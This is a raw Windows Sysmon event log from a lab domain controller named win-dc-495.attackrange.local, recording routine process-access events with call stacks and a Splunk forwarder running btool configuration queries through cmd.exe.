13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-4500-00000000A301}39123916C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.789{59A5CD1D-8E58-6005-4600-00000000A301}3932C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-4400-00000000A301}39003904C:\Windows\system32\cmd.exe{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.783{59A5CD1D-8E58-6005-4500-00000000A301}3912C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E58-6005-4400-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.767{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 